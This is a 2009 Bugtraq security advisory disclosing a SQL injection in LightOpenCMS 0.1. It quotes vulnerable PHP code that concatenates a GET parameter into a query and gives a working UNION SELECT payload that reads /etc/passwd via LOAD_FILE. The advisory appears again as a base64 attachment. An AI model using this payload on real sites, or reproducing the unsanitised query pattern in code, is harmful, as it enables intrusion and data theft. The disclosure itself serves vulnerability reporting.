LightOpenCMS 0.1 pre-alpha Remote SQL Injection
Date: Fri, 5 Jun 2009 15:38:17 +0200
Subject: LightOpenCMS 0.1 pre-alpha Remote SQL Injection
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@gmail.com.>
To: Bugtraq <bugtraq@securityfocus.com.>, str0ke <milw0rm@gmail.com.>
Content-Type: multipart/mixed; boundary=001636c5b3f6438f2a046b9a018d
X-Virus-Scanned: antivirus-gw at tyumen.ru
--001636c5b3f6438f2a046b9a018d
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit
******** Salvatore "drosophila" Fresta ********
[+] Application: LightOpenCMS
[+] Version: 0.1 pre-alpha
[+] Website: http://sourceforge.net/projects/lightopencms
[+] Bugs: [A] Remote SQL Injection
[+] Exploitation: Remote
[+] Date: 05 Jun 2009
[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com
***************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
***************************************************
[+] Bugs
- [A] Remote SQL Injection
[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: dbc.php
This bug allows a guest to inject arbitrary SQL
statments.
...
if (isset($_GET['id'])) {
$result = mysql_query("SELECT * FROM pages WHERE
id='".$_GET['id']."'");
return mysql_fetch_assoc($result);
...
***************************************************
[+] Code
- [A] Remote SQL Injection
http://www.site.com/path/index.php?id=-1' UNION ALL SELECT
1,2,LOAD_FILE('/etc/passwd'),4%23
***************************************************
[+] Fix
No fix.
***************************************************
--
Salvatore Fresta aka drosophila
CWNP444351
--001636c5b3f6438f2a046b9a018d
Content-Type: text/plain; charset=US-ASCII;
name="LightOpenCMS 0.1 pre-alpha Remote SQL Injection-05062009.txt"
Content-Disposition: attachment;
filename="LightOpenCMS 0.1 pre-alpha Remote SQL Injection-05062009.txt"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_fvkxyopy0
KioqKioqKiogICBTYWx2YXRvcmUgImRyb3NvcGhpbGEiIEZyZXN0YSAgICoqKioqKioqCgpbK10g
QXBwbGljYXRpb246IExpZ2h0T3BlbkNNUwpbK10gVmVyc2lvbjogMC4xIHByZS1hbHBoYQpbK10g
V2Vic2l0ZTogaHR0cDovL3NvdXJjZWZvcmdlLm5ldC9wcm9qZWN0cy9saWdodG9wZW5jbXMKClsr
XSBCdWdzOiBbQV0gUmVtb3RlIFNRTCBJbmplY3Rpb24KClsrXSBFeHBsb2l0YXRpb246IFJlbW90
ZQpbK10gRGF0ZTogMDUgSnVuIDIwMDkKClsrXSBEaXNjb3ZlcmVkIGJ5OiBTYWx2YXRvcmUgRnJl
c3RhIGFrYSBkcm9zb3BoaWxhClsrXSBBdXRob3I6IFNhbHZhdG9yZSBGcmVzdGEgYWthIGRyb3Nv
cGhpbGEKWytdIEUtbWFpbDogZHJvc29waGlsYXh4eCBbYXRdIGdtYWlsLmNvbQoKCioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKgoKWytdIE1lbnUKCjEp
IEJ1Z3MKMikgQ29kZQozKSBGaXgKCgoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioKClsrXSBCdWdzCgoKLSBbQV0gUmVtb3RlIFNRTCBJbmplY3Rpb24K
ClstXSBSaXNrOiBtZWRpdW0KWy1dIFJlcXVpc2l0ZXM6IG1hZ2ljX3F1b3Rlc19ncGMgPSBvZmYK
Wy1dIEZpbGUgYWZmZWN0ZWQ6IGRiYy5waHAKClRoaXMgYnVnIGFsbG93cyBhIGd1ZXN0IHRvIGlu
amVjdCBhcmJpdHJhcnkgU1FMCnN0YXRtZW50cy4KCi4uLgoKaWYgKGlzc2V0KCRfR0VUWydpZCdd
KSkgewogICAgICAgICAgICAkcmVzdWx0ID0gbXlzcWxfcXVlcnkoIlNFTEVDVCAqIEZST00gcGFn
ZXMgV0hFUkUgaWQ9JyIuJF9HRVRbJ2lkJ10uIiciKTsKICAgICAgICAgICAgcmV0dXJuIG15c3Fs
X2ZldGNoX2Fzc29jKCRyZXN1bHQpOwoKLi4uCgoKKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqCgpbK10gQ29kZQoKCi0gW0FdIFJlbW90ZSBTUUwgSW5q
ZWN0aW9uCgpodHRwOi8vd3d3LnNpdGUuY29tL3BhdGgvaW5kZXgucGhwP2lkPS0xJyBVTklPTiBB
TEwgU0VMRUNUIDEsMixMT0FEX0ZJTEUoJy9ldGMvcGFzc3dkJyksNCUyMwoKCioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKgoKWytdIEZpeAoKTm8gZml4
LgoKCioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKg==
--001636c5b3f6438f2a046b9a018d--
